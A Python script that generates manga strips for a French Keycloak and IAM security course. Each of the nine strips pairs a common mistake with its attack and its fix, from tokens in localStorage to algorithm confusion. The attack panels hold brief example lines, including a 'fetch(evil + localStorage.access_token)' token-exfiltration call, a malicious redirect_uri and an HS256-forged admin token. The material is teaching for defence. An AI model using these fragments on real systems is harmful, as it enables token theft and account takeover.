"""Planches manga du cours Keycloak et IAM (9 chapitres). Usage : python3 manga25.py <page>"""
import sys, pathlib
sys.path.insert(0, str(pathlib.Path(__file__).parent))
from manga_gabarit import strip3, apply
F = lambda *a: strip3(*a)
N = dict(rack=False, nuit=False)
STRIPS = [
 ("c1", F("mgk_1", "le rôle vérifié dans le navigateur", "IAM 1",
   dict(term=["if (idToken.roles", "  .includes('admin'))", "  afficherMenuAdmin();"], bulle=["Sans le rôle,", "pas de menu."]),
   dict(term=["curl -X DELETE", "  /api/admin/incidents/42", "204 No Content"], sfx="204"),
   "l'API décide", ["l'interface reflète, l'API tranche", "jeton d'accès vérifié", "rôle et portée par action", "test d'autorisation par règle"],
   "Masquer un menu n'empêche rien : c'est l'API qui décide, à chaque requête, à partir du jeton d'accès qui lui est destiné.")),
 ("c2", F("mgk_2", "la redirection avec étoile", "IAM 2",
   dict(term=["client crisis-web :", "  redirectUris :", "  https://crisis.fr/*"], bulle=["Plus pratique", "pour tester."]),
   dict(term=["redirect_uri=…/rediriger?", "  vers=site-piege", "code d'autorisation volé"], sfx="volé"),
   "des redirections exactes", ["une adresse exacte par besoin", "https uniquement", "PKCE en plus", "revue en MR"],
   "Une adresse de redirection générique permet de détourner le code d'autorisation : les redirections sont exactes, en https, et PKCE rend un code volé inutilisable.")),
 ("c3", F("mgk_3", "le jeton dans localStorage", "IAM 3",
   dict(term=["localStorage.setItem(", "  'access_token', jeton)", "// application Angular"], bulle=["Il faut bien", "le ranger", "quelque part."]),
   dict(term=["une faille XSS ailleurs :", "  fetch(evil + localStorage", "  .access_token)"], sfx="XSS"),
   "le jeton reste côté serveur", ["BFF qui porte les jetons", "cookie HttpOnly, SameSite", "CSP stricte", "aucun jeton dans le navigateur"],
   "Tout ce qui est dans le stockage du navigateur est lisible par un script injecté : un BFF garde les jetons côté serveur et le navigateur n'a qu'un cookie protégé.")),
 ("c4", F("mgk_4", "l'audience oubliée", "IAM 4",
   dict(term=["jwt.issuer-uri configuré", "  audience : non vérifiée", "« le jeton est signé »"], bulle=["Signé par", "Keycloak,", "donc valide."]),
   dict(term=["jeton émis pour « planning »", "  accepté par « incidents »", "  escalade possible"], **N, who='mika', expr='angry', pose='hips', sfx="aud"),
   "vérifier le destinataire", ["audience = cette API", "émetteur et algorithme imposés", "expiration courte", "test : autre audience → 401"],
   "Un jeton valide n'est pas forcément destiné à cette API : chaque service vérifie l'audience, sinon tout jeton du royaume ouvre toutes les API.")),
 ("c5", F("mgk_5", "la liaison par adresse", "IAM 5",
   dict(term=["premier accès externe :", "  même adresse e-mail", "  → lier automatiquement"], bulle=["C'est la même", "personne,", "logique."]),
   dict(term=["compte externe créé avec", "  l'adresse du coordinateur", "  compte local pris"], sfx="pris"),
   "une liaison prouvée", ["adresse vérifiée par une source sûre", "réauthentification avant liaison", "confirmation par l'utilisateur", "journal des liaisons"],
   "Lier des comptes sur la seule adresse électronique permet une prise de compte : la liaison exige une adresse vérifiée et une preuve de détention du compte local.")),
 ("c6", F("mgk_6", "le code relayé", "IAM 6",
   dict(term=["MFA : code à usage unique", "  pour les coordinateurs", "« on est protégés »"], bulle=["Deux facteurs,", "incassable."]),
   dict(term=["faux site de connexion", "  relaie mot de passe et code", "  en temps réel"], sfx="relais"),
   "des passkeys", ["WebAuthn lié au nom de domaine", "obligatoire pour les rôles sensibles", "code en repli seulement", "step-up pour clore une crise"],
   "Un code à usage unique se relaie par un faux site ; une passkey, liée au vrai nom de domaine, résiste à l'hameçonnage.")),
 ("c7", F("mgk_7", "deux cent quarante rôles", "IAM 7",
   dict(term=["coordinateur-N1, -N2…", "  lecteur-N1, -N2…", "  240 rôles"], bulle=["Un rôle par", "cas, c'est", "précis."]),
   dict(term=["nouvel agent : 17 rôles", "  à attribuer à la main", "  3 oubliés, 1 en trop"], **N, who='kai', expr='shock', sfx="240"),
   "des attributs et des relations", ["peu de rôles", "préfecture en attribut", "OPA ou OpenFGA décide", "politiques testées"],
   "Quand les rôles se multiplient par territoire, on garde peu de rôles et on ajoute attributs ou relations, évalués par un moteur de politiques testé.")),
 ("c8", F("mgk_8", "la console sur Internet", "IAM 8",
   dict(term=["https://sso.crisis.fr/admin", "  ouverte au monde", "  compte admin d'origine"], bulle=["On s'en sert", "de partout."]),
   dict(term=["essais de mots de passe", "  sur admin depuis 3 pays", "  toute la nuit"], sfx="admin"),
   "l'administration à part", ["console sur un nom interne", "administrateurs nominatifs", "MFA obligatoire", "journal d'administration"],
   "La console d'administration de Keycloak n'a rien à faire sur Internet : nom interne, réseau d'administration, comptes nominatifs avec MFA, et journal des actions.")),
 ("c9", F("mgk_9", "HS256 accepté", "IAM 9",
   dict(term=["API : algorithme du jeton", "  accepté tel quel", "  (RS256 attendu)"], bulle=["La bibliothèque", "gère."]),
   dict(term=["jeton signé en HS256", "  avec la clé publique", "  rôle admin accepté"], sfx="alg"),
   "imposer l'algorithme", ["liste d'algorithmes attendus", "refuser none et HS256", "clés lues dans le JWKS", "test d'attaque en CI"],
   "Une API qui accepte l'algorithme annoncé par le jeton peut être trompée : elle impose l'algorithme attendu et refuse tous les autres.")),
]
if __name__ == '__main__': apply(sys.argv[1], STRIPS)
